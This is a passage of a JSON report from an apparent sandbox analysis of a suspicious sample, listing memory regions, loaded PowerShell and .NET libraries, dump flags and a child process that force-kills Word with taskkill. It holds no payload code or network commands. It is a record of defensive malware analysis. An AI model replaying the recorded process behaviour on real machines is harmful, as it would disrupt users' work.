"process_00000010-region_00001724-addr_0x000007fffff10000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_319", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092628991, "entry_point": 0, "filename": null, "id": "region_1724", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:11.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791249059840, "type": "region", "version": 1 }, "end_va": 8791260975103, "entry_point": 8791249059840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_1726", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249059840, "timestamp": "00:01:11.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33370111, "entry_point": 33357824, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_1731", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 33357824, "timestamp": "00:01:11.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 456851456, "type": "region", "version": 1 }, "end_va": 457637887, "entry_point": 456851456, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1732", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 456851456, "timestamp": "00:01:11.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1737", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:12.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001739-addr_0x0000000001ff0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_322", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 33488896, "type": "region", "version": 1 }, "end_va": 33492991, "entry_point": 0, "filename": null, "id": "region_1739", "name": "private_0x0000000001ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33488896, "timestamp": "00:01:12.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 33574911, "entry_point": 33554432, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1741", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:12.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 43257855, "entry_point": 42991616, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1742", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 42991616, "timestamp": "00:01:12.296", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001743-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_324", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_1743", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:12.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42369023, "entry_point": 42348590, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1758", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 42336256, "timestamp": "00:01:13.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42401792, "type": "region", "version": 1 }, "end_va": 42405887, "entry_point": 0, "filename": null, "id": "region_1759", "name": "pagefile_0x0000000002870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42401792, "timestamp": "00:01:13.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505885368, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1760", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:13.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791242833920, "type": "region", "version": 1 }, "end_va": 8791243771903, "entry_point": 8791242833920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_1761", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791242833920, "timestamp": "00:01:13.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791243816960, "type": "region", "version": 1 }, "end_va": 8791244513279, "entry_point": 8791243816960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_1762", "name": "microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791243816960, "timestamp": "00:01:13.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791244537856, "type": "region", "version": 1 }, "end_va": 8791244742655, "entry_point": 8791244537856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_1763", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244537856, "timestamp": "00:01:13.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791244800000, "type": "region", "version": 1 }, "end_va": 8791245230079, "entry_point": 8791244800000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1764", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244800000, "timestamp": "00:01:13.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, "start_va": 8791245258752, "type": "region", "version": 1 }, "end_va": 8791248592895, "entry_point": 8791245258752, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_1765", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791245258752, "timestamp": "00:01:13.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 43319296, "type": "region", "version": 1 }, "end_va": 43323391, "entry_point": 0, "filename": null, "id": "region_1798", "name": "pagefile_0x0000000002950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 43319296, "timestamp": "00:01:16.605", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001799-addr_0x000000001b800000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_331", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 461373440, "type": "region", "version": 1 }, "end_va": 462422015, "entry_point": 0, "filename": null, "id": "region_1799", "name": "private_0x000000001b800000", "norm_filename": null, "region_type": "private_memory", "start_va": 461373440, "timestamp": "00:01:16.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_1800", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:16.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791238443008, "type": "region", "version": 1 }, "end_va": 8791238696959, "entry_point": 8791238443008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_1801", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791238443008, "timestamp": "00:01:16.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791239426048, "type": "region", "version": 1 }, "end_va": 8791240572927, "entry_point": 8791239426048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_1802", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791239426048, "timestamp": "00:01:16.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791240605696, "type": "region", "version": 1 }, "end_va": 8791242792959, "entry_point": 8791240605696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_1803", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791240605696, "timestamp": "00:01:16.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 44253183, "entry_point": 43909120, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1810", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 43909120, "timestamp": "00:01:17.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791232741376, "type": "region", "version": 1 }, "end_va": 8791234400255, "entry_point": 8791232741376, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_1811", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791232741376, "timestamp": "00:01:17.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791234445312, "type": "region", "version": 1 }, "end_va": 8791235936255, "entry_point": 8791234445312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1812", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791234445312, "timestamp": "00:01:17.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791283400704, "type": "region", "version": 1 }, "end_va": 8791290367999, "entry_point": 8791283400704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1813", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791283400704, "timestamp": "00:01:17.654", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001855-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_333", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_1855", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:01:18.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001856-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_334", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799693312, "type": "region", "version": 1 }, "end_va": 8791799758847, "entry_point": 0, "filename": null, "id": "region_1856", "name": "private_0x000007ff00190000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799693312, "timestamp": "00:01:18.764", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001857-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_335", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799758848, "type": "region", "version": 1 }, "end_va": 8791799824383, "entry_point": 0, "filename": null, "id": "region_1857", "name": "private_0x000007ff001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799758848, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001858-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_336", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799824384, "type": "region", "version": 1 }, "end_va": 8791799889919, "entry_point": 0, "filename": null, "id": "region_1858", "name": "private_0x000007ff001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799824384, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001859-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_337", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799889920, "type": "region", "version": 1 }, "end_va": 8791799955455, "entry_point": 0, "filename": null, "id": "region_1859", "name": "private_0x000007ff001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799889920, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001860-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_338", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799955456, "type": "region", "version": 1 }, "end_va": 8791800020991, "entry_point": 0, "filename": null, "id": "region_1860", "name": "private_0x000007ff001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799955456, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001861-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_339", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800020992, "type": "region", "version": 1 }, "end_va": 8791800086527, "entry_point": 0, "filename": null, "id": "region_1861", "name": "private_0x000007ff001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800020992, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001894-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_340", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800086528, "type": "region", "version": 1 }, "end_va": 8791800152063, "entry_point": 0, "filename": null, "id": "region_1894", "name": "private_0x000007ff001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800086528, "timestamp": "00:01:20.654", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001895-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_341", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800152064, "type": "region", "version": 1 }, "end_va": 8791800217599, "entry_point": 0, "filename": null, "id": "region_1895", "name": "private_0x000007ff00200000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800152064, "timestamp": "00:01:20.654", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe", "filename": "c:\\windows\\system32\\taskkill.exe", "id": "proc_11", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 9, "ref_parent_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1966", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1967", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1968", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1969", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1970", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1971", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1972", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 4280942592, "type": "region", "version": 1 }, "end_va": 4281069567, "entry_point": 4280959632, "filename": "\\Windows\\System32\\taskkill.exe", "id": "region_1973", "name": "taskkill.exe", "norm_filename": "c:\\windows\\system32\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 4280942592, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1974", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1975", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:23.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_1976", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:23.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1977", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:23.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, 